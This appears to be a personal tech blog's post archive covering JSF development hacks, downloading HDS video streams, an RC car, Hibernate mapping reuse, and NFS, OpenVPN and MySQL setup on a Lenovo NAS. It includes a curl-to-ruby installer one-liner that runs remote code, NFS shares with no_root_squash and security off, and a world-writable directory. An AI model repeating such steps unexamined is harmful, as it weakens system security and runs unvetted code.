• About

N1nja Hacks

~ Random assortment of solutions, sneaky hacks and technical HOWTOs

N1nja Hacks

Author Archives: valblant

How to use JSF libraries without packaging them as JARs during development

25 Friday Sep 2015

Posted by valblant in JSF

≈ Leave a comment

Tags

JSF

Introduction

JSF spec allows us to place JSF configuration documents, such as faces-config.xml and *taglib.xml either inside WEB-INF/ of our WAR, or in META-INF/ of JARs included in WEB-INF/lib of our WAR. For JSF annotated classes, they can either be in WEB-INF/classes, or in the included JARs.

But what if we want all these things to work properly without having to package all our JSF dependency projects as jars? Naturally, we never want to deploy like that, but during development it would be really nice, b/c then we could actually make changes to any code inside our JSF dependencies with full hot-swap support, without having to package anything, or to restart the application server! Unfortunately, this is not possible with JSF out-of-the-box…

This article describes a technique I used to work around these limitations of JSF, thus gaining the ability to make direct modifications to my JSF libraries without restarting or repackaging, and achieving the state of coding zen :).

This solution was tested with Mojarra JavaServer Faces 2.1.7, and it is intended to work with Eclipse workspaces. There would probably be small differences in the implementation for other configurations, but the general approach should work everywhere.

Solution

We have 3 problems to solve:

1) Picking up JSF Annotated Classes from other JSF projects in the workspace

This turned out to be the hardest problem to solve.

Normally JSF annotated classes (such as @FacesComponent, @FacesConverter, @FacesRenderer, etc) must be inside a JAR, or in /WEB-INF/classes/. What we need is to pick up annotated classes from other Eclipse projects we depend on, which means that they need to be loaded from our Web Project’s classpath.

There is no way to extend JSF to do this, b/c everything inside AnnotationScanTask and ProvideMetadataToAnnotationScanTask is hard coded. In order to make the necessary changes, we’ll need some AspectJ magic.

The idea is to use Load Time Weaving to advise the call to JavaClassScanningAnnotationScanner.getAnnotatedClasses() and merge results from our own annotation scan with the results coming from the stock JSF implementation.

This can be achieved with a simple aspect, and some code to scan for annotated classes, which is the first part of our solution. I am using Google Reflections here to do the annotation scan inside the packages where I know my JSF libraries will be. Modify this for your own needs.

JsfConfigurationShimForEclipseProjectsAspect.aj:

/**
 * This is an AspectJ shim used to find more JSF annotated classes during the setup process. 
 * Normally, JSF configuration and JSF annotations are only processed on paths inside our own WAR, and from other jars.
 * However, in development mode we are interested in linking to DryDock dependencies as local Eclipse projects, rather than jars.
 * This shim provides a missing extension point, which scans the DryDock project classpath for JSF annotations.
 *

 * The other part of this solution is found in <code>EclipseProjectJsfResourceProvider</code>
 *

 * Since we are weaving JSF, Load Time Weaving is required, which means that this aspect must be declared in <code>META-INF/aop.xml</code>.
 * Also, Tomcat must be started with:
 *



<pre>
 *  -javaagent:/fullpath/aspectjweaver-version.jar -classpath /fullpath/aspectjrt-version.jar
 * </pre>

 *
 * @see EclipseProjectJsfResourceProvider
 *
 * @author Val Blant
 */
public aspect JsfConfigurationShimForEclipseProjectsAspect {

	pointcut sortedFacesDocumentsPointcut() : execution(* ConfigManager.sortDocuments(..));
	after() returning (DocumentInfo[] sortedFacesDocuments): sortedFacesDocumentsPointcut() {
		System.out.println("\n ====== Augmented list of JSF config files detected with JsfConfigurationShimForEclipseProjectsAspect ====== ");
		for ( DocumentInfo doc : sortedFacesDocuments ) {
			System.out.println(doc.getSourceURI().toString());
		}
		System.out.println("\n");
	}

	pointcut getAnnotatedClassesPointcut(Set<URI> urls) : execution(* JavaClassScanningAnnotationScanner.getAnnotatedClasses(Set<URI>)) && args(urls);
	Map<Class<? extends Annotation>, Set<Class<?>>> around(Set<URI> urls): getAnnotatedClassesPointcut(urls)  {

		Map<Class<? extends Annotation>, Set<Class<?>>> oldMap = proceed(urls);
		Map<Class<? extends Annotation>, Set<Class<?>>> newMap = EclipseJsfDryDockProjectAnnotationScanner.getAnnotatedClasses();
		Map<Class<? extends Annotation>, Set<Class<?>>> mergedMap = new AnnotatedJsfClassMerger().merge(oldMap, newMap);

		return mergedMap;

	}
}

EclipseJsfDryDockProjectAnnotationScanner.java:

/**
 * Scans DryDock project classpath to find any JSF annotated classes. This scanner is activated by 
 * the <code>JsfConfigurationShimForEclipseProjectsAspect</code>, which requires Load Time Weaving.
 *

 * This class should only be used in development! It is part of a solution that allows us to run the app
 * against locally imported DryDocked projects.
 *
 * @see JsfConfigurationShimForEclipseProjectsAspect
 * @see EclipseProjectJsfResourceProvider
 *
 * @author Val Blant
 */
public class EclipseJsfDryDockProjectAnnotationScanner extends AnnotationScanner {
	
	private static final Log log = LogFactory.getLog(EclipseJsfDryDockProjectAnnotationScanner.class);
	
	
	
	private static Reflections reflections = new Reflections( 
			new ConfigurationBuilder()
				.addUrls(ClasspathHelper.forPackage("ca.gc.agr.common.web.jsf"))
				.addUrls(ClasspathHelper.forPackage("ca.ibm.web"))
	);


	public EclipseJsfDryDockProjectAnnotationScanner(ServletContext sc) {
		super(sc);
	}
	
	
	public static Map<Class<? extends Annotation>, Set<Class<?>>> getAnnotatedClasses() {
		Map<Class<? extends Annotation>, Set<Class<?>>> annotatedClassMap = new HashMap<>();
		
		for ( Class<? extends Annotation> annotation : FACES_ANNOTATION_TYPE ) {
			Set<Class<?>> annotatedClasses = reflections.getTypesAnnotatedWith(annotation);
			
			if ( !annotatedClasses.isEmpty() ) {
				Set<Class<?>> classes = annotatedClassMap.get(annotation);
				if ( classes == null ) {
					classes = new HashSet<Class<?>>();
					annotatedClassMap.put(annotation, classes);
				}
				
				classes.addAll(annotatedClasses);
			}
		}
		
		log.info(" ====== Found additional JSF annotated classes from Eclipse classpath ====== \n" + annotatedClassMap);
		
		return annotatedClassMap;
	}

	@Override
	public Map<Class<? extends Annotation>, Set<Class<?>>> getAnnotatedClasses(Set<URI> urls) {
		return getAnnotatedClasses();
	}

}

AnnotatedJsfClassMerger.java:

/**
 * Merges 2 maps of JSF annotated classes into one map.
 * 
 * This class should only be used in development! It is part of a solution that allows us to run the app
 * against locally imported DryDocked projects.
 * 
 * @see JsfConfigurationShimForEclipseProjectsAspect
 * @see EclipseProjectJsfResourceProvider
 *
 * @author Val Blant
 */
public class AnnotatedJsfClassMerger {
	
	public Map<Class<? extends Annotation>, Set<Class<?>>> merge(
				Map<Class<? extends Annotation>, Set<Class<?>>> oldMap,
				Map<Class<? extends Annotation>, Set<Class<?>>> newMap) {
		
		
		Set<Class<? extends Annotation>> annotations = new HashSet<>();
		annotations.addAll(oldMap.keySet());
		annotations.addAll(newMap.keySet());
		
		Map<Class<? extends Annotation>, Set<Class<?>>> mergedMap = new HashMap<>();
		for ( Class<? extends Annotation> annotation : annotations ) {
			Set<Class<?>> classes = new HashSet<>();
			
			Set<Class<?>> oldClasses = oldMap.get(annotation);
			Set<Class<?>> newClasses = newMap.get(annotation);
			
			if ( oldClasses != null ) classes.addAll(oldClasses);
			if ( newClasses != null ) classes.addAll(newClasses);
			
			mergedMap.put(annotation, classes);
		}
		
		return mergedMap;
	}

}

Next, we need to properly set up the Load Time Weaver.

First we create src/main/resources/META-INF/aop.xml in our Web Project.

META-INF/aop.xml:

<!-- This file is read by AspectJ weaver java agent. Make sure you specify the following on server startup command line: -javaagent:/fullpath/AgriShare/aspectjweaver-version.jar -classpath /fullpath/AgriShare/aspectjrt-version.jar Also, make sure that you actually compile the aspects specified below. Eclipse can't do it! You'll have to use Gradle for that. -->

<aspectj>
 <aspects>
   <aspect name="ca.gc.pinss.web.jsf.drydock.eclipse.JsfConfigurationShimForEclipseProjectsAspect"/>
 </aspects>
 <weaver options="-verbose -showWeaveInfo -XnoInline">
 	<include within="com.sun.faces.config.*"/>
 </weaver>
</aspectj>

Now we need to make sure that we start our application with the AspectJ weaver.

  • Append the following to your Application Server’s startup JVM parameters:
-javaagent:/home/val/.gradle/caches/modules-2/files-2.1/org.aspectj/aspectjweaver/1.7.4/d9d511e417710492f78bb0fb291a629d56bf4216/aspectjweaver-1.7.4.jar

Note: Use the correct path for your machine!

  • Make sure that this jar is first on your Application Server’s classpath:
/home/val/.gradle/caches/modules-2/files-2.1/org.aspectj/aspectjrt/1.7.4/e49a5c0acee8fd66225dc1d031692d132323417f/aspectjrt-1.7.4.jar

Note: Use the correct path for your machine!

And that’s it – now your annotated JSF classes will be picked up directly from project classpath!

To make sure that it is working, look for messages from EclipseJsfDryDockProjectAnnotationScanner in the log. It will have the following heading:

 ====== Found additional JSF annotated classes from Eclipse classpath ======

You should also see some messages from the AspectJ weaver:

[WebappClassLoader@6426a58b] weaveinfo Join point 'method-execution(
com.sun.faces.config.DocumentInfo[] com.sun.faces.config.ConfigManager.sortDocuments(com.sun.faces.config.DocumentInfo[], com.sun.faces.config.FacesConfigInfo))'
in Type 'com.sun.faces.config.ConfigManager' (ConfigManager.java:503) 
advised by afterReturning advice from 'ca.gc.pinss.web.jsf.drydock.eclipse.JsfConfigurationShimForEclipseProjectsAspect' (JsfConfigurationShimForEclipseProjectsAspect.aj:36)
[WebappClassLoader@6426a58b] weaveinfo Join point 'method-execution(
java.util.Map com.sun.faces.config.JavaClassScanningAnnotationScanner.getAnnotatedClasses(java.util.Set))' 
 in Type 'com.sun.faces.config.JavaClassScanningAnnotationScanner' (JavaClassScanningAnnotationScanner.java:121) 
 advised by around advice from 
'ca.gc.pinss.web.jsf.drydock.eclipse.JsfConfigurationShimForEclipseProjectsAspect' (JsfConfigurationShimForEclipseProjectsAspect.aj:45)

2) Picking up Taglibs from other JSF Projects in the Workspace

This one is easy in comparison.

All we need to do here is to specify an additional custom FacesConfigResourceProvider.

EclipseProjectJsfResourceProvider.java:

/**
 * This custom resource provider is used for finding JSF Resources located in other Eclipse Projects, rather 
 * than jars. JSF spec does not support this, but it is very useful for running DryDocked projects inside the local Eclipse workspace.
 *

 * In order to enable this resource provider, this class's name must be specified in 
 * <code>META-INF/services/com.sun.faces.spi.FacesConfigResourceProvider</code>
 *

 * <b>NOTE:</b> The Gradle build will not include the com.sun.faces.spi.FacesConfigResourceProvider file, b/c we never want this 
 * customization to be deployed - it's for development only.
 * 
 * @see JsfConfigurationShimForEclipseProjectsAspect
 *
 * @author Val Blant
 */
public class EclipseProjectJsfResourceProvider implements FacesConfigResourceProvider {
	
	private static final Log log = LogFactory.getLog(EclipseProjectJsfResourceProvider.class);
	
	
	
	@Override
	public Collection<URI> getResources(ServletContext context) {
		
		List<URI> unsortedResourceList = new ArrayList<URI>();

        try {
            for (URI uri : loadURLs(context)) {
            	if ( !uri.toString().contains(".jar!/") ) {
                   unsortedResourceList.add(0, uri);
            	}
            }
        } catch (IOException e) {
            throw new FacesException(e);
        }

        List<URI> result = new ArrayList<>();
        
        // Then load the unsorted resources
        result.addAll(unsortedResourceList);
        
		log.info(" ====== Found additional JSF configuration resources on Eclipse classpath ====== \n" + result);

        return result;
	}
	
	
    private Collection<URI> loadURLs(ServletContext context) throws IOException {

        Set<URI> urls = new HashSet<URI>();
        try {

// Turns out these are already grabbed by MetaInfFacesConfigResourceProvider, so we don't need to do it again	
//            for (Enumeration<URL> e = Util.getCurrentLoader(this).getResources("META-INF/faces-config.xml"); e.hasMoreElements();) {
//                    urls.add(new URI(e.nextElement().toExternalForm()));
//            }
            URL[] urlArray = Classpath.search("META-INF/", ".taglib.xml");
            for (URL cur : urlArray) {
                urls.add(new URI(cur.toExternalForm()));
            }
        } catch (URISyntaxException ex) {
            throw new IOException(ex);
        }
        return urls;
        
    }
	

}

To register this provider, we add the following into our Web Project:

src/main/resources/META-INF/services/com.sun.faces.spi.FacesConfigResourceProvider:

ca.gc.agr.common.web.jsf.drydock.eclipse.EclipseProjectJsfResourceProvider

Note: Use the correct package name for your project!

3) Picking up Facelet includes and resources from OTHER JSF PROJECTS IN THE WORKSPACE

This one is also easy.

We create a custom Facelets ResourceResolver.

ClasspathResourceResolver.java:

/**
 * This is a special Facelets ResourceResolver, which allows us to ui:include resources from
 * the classpath, rather than from jars. This is necessary in for the Incubator to see stuff
 * in other projects under META-INF/resources/ 
 * 
 * @author Val Blant
 */
public class ClasspathResourceResolver extends DefaultResourceResolver {
	/**
	 * First check the context root, then the classpath
	 */
    public URL resolveUrl(String path) {
        URL url = super.resolveUrl(path);
        if (url == null) {
            
            /* classpath resources don't start with /, so this must be a jar include. Convert it to classpath include. */
            if (path.startsWith("/")) {
                path = "META-INF/resources" + path;
            }
            url = Thread.currentThread().getContextClassLoader().getResource(path);
        }
        return url;
    }
}

Now we register it in our web.xml:

	<!-- This allows us to "ui:include" resources from the classpath, rather than from jars, which is important for working with DryDocked projects directly from our Eclipse workspace -->
	<context-param>
		<param-name>facelets.RESOURCE_RESOLVER</param-name>
		<param-value>ca.gc.agr.common.web.jsf.ClasspathResourceResolver</param-value>
	</context-param>	

And that’s it! We now have everything we need to load all JSF resources from Eclipse projects instead of JARs.

Eclipse Project Setup

All that remains is to reconfigure the Eclipse workspace to start using our new capabilities.

  1. Import your JSF library projects and all their dependencies into your Eclipse workspace together with the Web Application you are working on.
  2. Go to all projects that have dependencies on common component jars, delete the jar dependencies, and replace them with project dependencies that are now in your workspace.
  3. Get rid of any test related project exports from the library projects that might interfere with the running of the app. This may not be necessary depending on your configuration.
  4. Configure your Application Server classpath to use the Eclipse Projects instead of JARs.
  5. Configure your build scripts to turn off these modifications, so they don’t get deployed anywhere past your development machine. This is as simple as not including META-INF/services/com.sun.faces.spi.FacesConfigResourceProvider and META-INF/aop.xml in your WAR.

And that’s it.

How to Save HDS Flash Streams from any web page

29 Thursday Jan 2015

Posted by valblant in video

≈ 28 Comments

Tags

flash, Flash video, HDS

I came across a Flash video that I was not able to save with any Video Downloader app, including the ones that actually sniff traffic on your network adapter, such as Replay Media Catcher and many others.

Turns out that this particular page was using the new Adobe HTTP Dynamic Streaming (HDS) technology. With HDS, the original MP4 or FLV file is split up into many F4F segments, which are then served to the media player on the page one after the other, so there is no single video file to download like with most other video streaming technologies.

You can easily check if HDS is being used by using Firefox to watch the video.

  1. Clear Firefox cache (Tools -> Options -> Network, Clear Cached Web Content, Clear User Data)
  2. Load the page with the video
  3. Open a new tab and browse to about:cache?storage=disk
  4. Search for a bunch of files that have the word ‘Frag’ in them. They’ll look something like this:
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag39 
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag38 
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag37 
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag36

These are all the F4F fragments of the video. You could download them all and combine them together, but that’s not the best way to do this.

There is a script called AdobeHDS.php, which can automate the download process for you if you provide it with the F4M Manifest for the stream. You can download the script from https://github.com/K-S-V/Scripts

This manifest file is easy to obtain, b/c it is delivered via a plain GET request that is issued before the video starts playing. To find the URL:

  1. Open Firefox Console (Ctrl+Shift+K) or Tools -> Web Developer -> Web Console
  2. Make sure that “Net” filter is selected
  3. Clear the Console
  4. Open the video page and let the video load
  5. In the Filter text box type “f4m” and you should now see a few F4M requests. You want the first one, which will probably be called “manifest.f4m“. Mine looked like this:
GET http://capi.9c9media.com/destinations/ctvnews_web/platforms/desktop/contents/540901/contentpackages/546418/stacks/1130329/manifest.f4m

Now just run the script with the manifest URL and you should get the re-combined flv file:

$ php AdobeHDS.php --delete --manifest "http://capi.9c9media.com/destinations/ctvnews_web/platforms/desktop/contents/540901/contentpackages/546418/stacks/1130329/manifest.f4m"
 KSV Adobe HDS Downloader

Processing manifest info.... 
Quality Selection: 
 Available: 2048 1856 1536 1280 896 640 480 299
 Selected : 2048 
Fragments Total: 55, First: 1, Start: 1, Parallel: 8 
Downloading 55/55 fragments 
Found 55 fragments 
Finished

You should now have an FLV file waiting for you in the script directory.

For Mac Users

Posting some info from a comment by Eric L. Pheterson below:

To add a few more baby steps (for Mac users) :

  • When you view the AdobeHDS.php file at Sourceforge, copy/paste it into a file, and name it AdobeHDS.php
  • PHP should be installed alreadyon your mac
  • A dependency of AdobeHDS is not installed, so in Terminal run :
brew install homebrew/php/php55-mcrypt
  • After installing mcrypt, you must open a new terminal window or tab to use it
  • If you don’t have brew installed, in Terminal run :
/usr/bin/ruby -e “$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)”
  • After installing brew, run
brew update
  • This Firefox extension will perfectly present you with the php command you need : https://addons.mozilla.org/en-US/firefox/addon/hds-link-detector/

How to build a WebRTC Controlled RC Car

23 Tuesday Sep 2014

Posted by valblant in Android

≈ Leave a comment

Tags

android, webrtc

Creeper Drone was created from a cheap RC truck, which I modified with an Android and Raspberry Pi, so it can now be driven over a WiFi network from any browser that supports WebRTC. The Creeper transmits a video stream, allowing the driver to control the Creeper from a remote location. Bi-directional audio is also supported, providing the driver with the ability to converse through the Creeper.

This post was more convenient to do as an Instructable, so you can find all the details about the hardware and software, including source code and 3D Models here:

http://www.instructables.com/id/WebRTC-Creeper-Drone-Browser-Controlled-RC-Car/

Video: https://www.youtube.com/watch?v=fUkK5v_VtI0

Hibernate XML Mapping Fragment Re-use

19 Friday Sep 2014

Posted by valblant in Hibernate

≈ Leave a comment

Tags

Hibernate

Hibernate mapping files are a frequent source of code duplication. For example, let’s say that all your database tables contain the same set of audit columns. Why should you have to repeat that declaration in every single mapping file? Or maybe you have similarly structured tables with different names, which is also a good opportunity for reuse.

It is possible to reuse the same Hibernate XML mapping snippet from other mapping files by utilizing XML entities.

XML snippet in ca/gc/agr/common/jms/domain/portal/PortalEventMessage.xml:

<!-- This fragment is included from an another hbm -->

	<version name="lockSeqNum" type="int" column="LOCK_SEQ_NUM" />
	
	<property name="partyId" type="string" column="PARTY_ID" length="20" not-null="true" />
	<property name="fromAppNameEnglish" type="string" column="SOURCE_SYSTEM_NAME_ENG" length="100" not-null="true"  />        
	<property name="fromAppNameFrench" type="string" column="SOURCE_SYSTEM_NAME_FR" length="100" not-null="true" />
	
        ... etc ...
	
	<property name="createdDtm" type="timestamp" column="CREATED_DTM" />
	<property name="createdUserOid" type="long" column="CREATED_USER_OID" />
	<property name="updatedDtm" type="timestamp" column="UPDATED_DTM" />
	<property name="updatedUserOid" type="long" column="UPDATED_USER_OID" />

Hibernate mapping::

<?xml version="1.0"?>
<!DOCTYPE hibernate-mapping SYSTEM "http://www.hibernate.org/dtd/hibernate-mapping-3.0.dtd" [
    <!ENTITY commonMapping SYSTEM "classpath://ca/gc/agr/common/jms/domain/portal/PortalEventMessage.xml">
    ]>

<hibernate-mapping>

    <class name="ca.gc.agr.common.jms.domain.portal.PortalEventMessage" table="PIN_PORTAL_EVENT" dynamic-update="true">

        <id name="oid" type="long" column="PORTAL_EVENT_OID" unsaved-value="0">
            <generator class="sequence">
                <param name="sequence">pin_portal_event_seq</param>
            </generator>
        </id>

		&commonMapping;

    </class>
    
</hibernate-mapping>

Make sure that the XML snippet is on the classpath and you are done.

Secure NFS Shares on Lenovo ix2-dl NAS

27 Thursday Feb 2014

Posted by valblant in NAS

≈ 3 Comments

Tags

NAS, VPN

Introduction

ix2-dl offers many ways to connect to it, but none of them can provide such a seamless experience for Linux computers as NFS:

Protocols

The problem with NFS is that without a Domain Controller that can provide Kerberos authentication somewhere on the LAN, NFS is horribly insecure. All you have to do to infiltrate the storage is somehow connect to the LAN. Once you are in, it is trivial to steal everything from un-authenticated NFS shares.

Samba 4

It is possible to set up Samba4 as a Domain Controller that will provide Active Directory and Kerberos services:

http://sector7e.com/setup-of-samba4-4-10-on-ubuntu-server-12-04-lts-and-13-10/
http://wiki.samba.org/index.php/Samba4/HOWTO
https://help.ubuntu.com/community/Kerberos

The set up procedure is not trivial unfortunately, and would result in a complication of my infrastructure that I was not willing to deal with.

Windows File Sharing (CIFS)

CIFS shares are attractive, b/c they have built in password authentication. I have tried using CIFS mounts, but quickly rejected the idea b/c the shares were much slower than NFS, did not allow symlinks and did not allow fine grained ownership control of files under one share.

OpenVPN

This ended up being the best and simplest option that allows me to have complete and seamless integration of my shares and best possible security.

The idea is to completely turn off all security on the NFS share, including no_root_squash, and then export the shares exclusively over the VPN subnet. Here’s an example, with an additional read-only export for the local wired net:

shares

OpenVPN Setup

Before you can follow these instructions, you must first enable SSH access to the NAS, connect to package repositories and tie into the boot process. All of this is described in my previous posts:

https://n1njahacks.wordpress.com/2014/02/25/ssh-access-to-lenovo-ix2-dl-nas/
https://n1njahacks.wordpress.com/2014/02/27/setting-up-mysql-server-on-lenovo-ix2-dl-nas/

Install OpenVPN package and dependencies:

# ipkg install openvpn

Open /opt/etc/init.d/S20openvpn:

  • Comment out the tunnel driver and “return 0” line. It’s important to make sure that this script does not try to insert the module, b/c module tun is already compiled into the kernel on this distro
  • Specify correct file name for --config (lan-server.conf)

Add the startup script to /etc/rc.local:

# Start OpenVPN
echo 'Starting OpenVPN server...'
/opt/etc/init.d/S20openvpn

Note: in order for this to work, you must first modify the distro’s boot process as described in the previous section.

OpenVPN Server Configuration

I will provide my config as an example.

/opt/etc/openvpn/lan-server.conf:

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 192.168.129.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 192.168.129.1
#
server 192.168.129.0 255.255.255.224

daemon

# Which TCP/UDP port should OpenVPN listen on?
port 1194

# TCP or UDP server?
;proto tcp
proto udp

# By increasing the MTU size of the tun adapter and by disabling
# OpenVPN's internal fragmentation routines the throughput can be
# increased quite dramatically. The reason behind this is that by
# feeding larger packets to the OpenSSL encryption and decryption
# routines the performance will go up. The second advantage of not
# internally fragmenting packets is that this is left to the operating
# system and to the kernel network device drivers.
tun-mtu 9000
fragment 0
mssfix 0

# &quot;dev tun&quot; will create a routed IP tunnel,
dev tun0

# SSL/TLS root certificate (ca), certificate
# (cert), and private key (key).  Each client
# and the server must have their own cert and
# key file.  The server and all clients will
# use the same ca file.
#
# See the &quot;easy-rsa&quot; directory for a series
# of scripts for generating RSA certificates
# and private keys.  Remember to use
# a unique Common Name for the server
# and each of the client certificates.
#
# Any X509 key management system can be used.
# OpenVPN can also use a PKCS #12 formatted key file
# (see &quot;pkcs12&quot; directive in man page).
ca /etc/ssl/certs/VACE-LAN-CA-Chain.crt
cert /etc/ssl/certs/nas-lan-server.crt
key /etc/ssl/private/nas.key

# Diffie hellman parameters.
# Generate your own with:
#   openssl dhparam -out dh1024.pem 1024
dh /etc/ssl/private/dh1024.pem

# Maintain a record of client  virtual IP address
# associations in this file.  If OpenVPN goes down or
# is restarted, reconnecting clients can be assigned
# the same virtual IP address from the pool that was
# previously assigned.
ifconfig-pool-persist /opt/var/openvpn/lan-ipp.txt

# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120

# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo

# The maximum number of concurrently connected
# clients we want to allow.
max-clients 3

# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.

# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun

# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status /opt/var/openvpn/lan-status.log

# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the &quot;\Program Files\OpenVPN\log&quot; directory).
# Use log or log-append to override this default.
# &quot;log&quot; will truncate the log file on OpenVPN startup,
# while &quot;log-append&quot; will append to it.  Use one
# or the other (but not both).
;log         openvpn.log
log-append  /opt/var/openvpn/lan-server.log
writepid    /opt/var/openvpn/lan-server.pid

# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 4

# Silence repeating messages.  At most 20
# sequential messages of the same message
# category will be output to the log.
mute 20

Pay close attention to the comment on tun-mtu. These settings significantly speed up the tunnel.

OpenVPN Client Configuration

/etc/openvpn/nas-client.conf:

daemon

client

remote nas

dev tun

port 1194
proto udp

# By increasing the MTU size of the tun adapter and by disabling
# OpenVPN's internal fragmentation routines the throughput can be
# increased quite dramatically. The reason behind this is that by
# feeding larger packets to the OpenSSL encryption and decryption
# routines the performance will go up. The second advantage of not
# internally fragmenting packets is that this is left to the operating
# system and to the kernel network device drivers.
tun-mtu 9000
fragment 0
mssfix 0

log-append  /var/log/openvpn/nas-client.log

# Downgrade privileges after initialization (non-Windows only)
user nobody
group nogroup

# Try to preserve some state across restarts.
persist-key
persist-tun

# SSL/TLS parms.
# See the server config file for more
# description.  It's best to use
# a separate .crt/.key file pair
# for each client.  A single ca
# file can be used for all clients.
ca /etc/ssl/certs/VACE-LAN-CA-Chain.crt
cert /etc/ssl/certs/boss-lan-client.crt
key /etc/ssl/private/boss.key

# Enable compression on the VPN link.
# Don't enable this unless it is also
# enabled in the server config file.
comp-lzo

# Set log file verbosity.
verb 4

# Silence repeating messages
mute 20

Mounting NFS shares

That’s pretty much it! Now you can mount the NFS shares from the client like so:
/etc/fstab:

nas_tunnel:/nfs/music    /mnt/nas/music     nfs     rw,auto    0       0
nas_tunnel:/nfs/video    /mnt/nas/video     nfs     rw,auto    0       0
nas_tunnel:/nfs/programs /mnt/nas/programs  nfs     rw,auto    0       0
nas_tunnel:/nfs/work     /mnt/nas/work      nfs     rw,auto    0       0
nas_tunnel:/nfs/pictures /mnt/nas/pictures  nfs     rw,auto    0       0

Where nas_tunnel = 192.168.129.1

Tunnel Performance Tuning

https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux

Setting up MySQL server on Lenovo ix2-dl NAS

27 Thursday Feb 2014

Posted by valblant in NAS

≈ 9 Comments

Tags

MySQL server, NAS

This article will explain how to install a MySQL server on the Lenovo ix2-dl NAS. It will also demonstrate how to customize the boot process.

This MySQL server will be set up as the back-end for my MediaWiki installation running on a different server.

Enable SSH Access

https://n1njahacks.wordpress.com/2014/02/25/ssh-access-to-lenovo-ix2-dl-nas/

Basic Config

Add the following to /etc/profile:

alias ls='ls --color'

# Set the locale properly
export LANG=en_US.utf8
export LANGUAGE=en_US:en

The locale settings were necessary to properly display Russian file names from a Terminal.

Custom Boot Scripts

One of the difficulties with this box is that it does not respect the startup scripts in /etc/rc* directories, even though they are there. Instead boot processes are managed by appmd, which uses an XML config file found here: /usr/local/cfg/sohoProcs.xml. Unfortunately, you can’t modify that file directly.

The /usr directory is actually part of the /boot/images/apps image mounted on /mnt/apps, so if we want to add anything to the startup config, we must modify the image itself.

Here are some scripts to help with that:

/opt/editconfig.sh:

#!/bin/sh
# edit the bootup config of the ix2
# inspired by http://www.chrispont.co.uk/2010/10/allow-startup-daemons-on-storcenter-ix2-200-nas/
# modified from http://techmonks.net/installing-transmission-and-dnsmasq-on-a-nas/
mknod -m0660 /dev/loop3 b 7 3
chown root.disk /dev/loop3
mkdir /tmp/apps
mount -o loop /boot/images/apps /tmp/apps
vi /tmp/apps/usr/local/cfg/sohoProcs.xml
sleep 1
umount /tmp/apps
rm /dev/loop3

/opt/init-opt.sh:

#!/bin/sh
# modified from http://techmonks.net/installing-transmission-and-dnsmasq-on-a-nas/

rm /opt/init-opt.log
echo "Last bootup:" >> /opt/init-opt.log
date >> /opt/init-opt.log
#Add your command below
/etc/init.d/rc.local start >> /opt/init-opt.log
while true; do
        sleep 1d
done

After creating these scripts, you must run /opt/editconfig.sh and make modifications to the opened file. At the end of <Group Level="2"> section:

<Group Level="2">

    ..... Other Program defs .....

    <Program Name="CustomInitScript" Path="sh">
        <Args>/opt/init-opt.sh</Args>
        <SysOption Restart="-1"/>
    </Program>

</Group>

After these modifications, you can place all your startup scripts into /etc/rc.local, which will be executed after you reboot.

svcd Performance Tweak

svcd is some sort of indexing service that tends to take up a lot of CPU. We can renice it though.

Since we now have access to sohoProcs.xml (see previous section), we can set the Nice level in there.

Run /opt/editconfig.sh, find the entry for svcd and add the Nice attribute:

<Program Disable="0" Name="Svcd" Path="/usr/local/svcd/svcd">
        <SysOption MaxMem="96M" Nice="19" Restart="-1"/>
</Program>

Connecting to package (ipkg) repositories

LifeLine Linux distro in this NAS is based on NSLU2-Linux, so we can make use of their resources.

Open /etc/ipkg.conf and add the following:

src cross http://ipkg.nslu2-linux.org/feeds/optware/cs08q1armel/cross/unstable
src native http://ipkg.nslu2-linux.org/feeds/optware/cs08q1armel/native/unstable
root@ix2-dl:/# ipkg update

MySQL Installation

root@ix2-dl:/# ipkg install mysql5

This will install MySQL and dependencies into /opt (aka /mnt/system/opt), but the permissions will be wrong so the server won’t start after installation. You need to follow these steps:

  • Add mysql user through the Web Console
  • Fix permissions
root@ix2-dl:/# chmod o+w /opt/var
root@ix2-dl:/# chown -R mysql /opt/mysql-test
root@ix2-dl:/# chown -R mysql /opt/var/mysql
  • In /etc/passwd change home directory for ‘mysql’ user to /opt/var/mysql
  • Setup environment
root@ix2-dl:/# su - mysql
mysql@ix2-dl:/# vi .bashrc

Add the following:

export PATH=$PATH:/opt/bin
  • Start MySQL. As root:
root@ix2-dl:/# /opt/share/mysql/mysql.server start
Starting MySQL..
  • Configure the server. Follow the wizard and change the root password.
root@ix2-dl:/# su - mysql
mysql@ix2-dl:/# /opt/bin/mysql_secure_installation
  • Log in:
root@ix2-dl:/# su - mysql
mysql@ix2-dl:/# mysql -u root -p
Enter password: *****
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.88 optware distribution 5.0.88-1

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| lib                | 
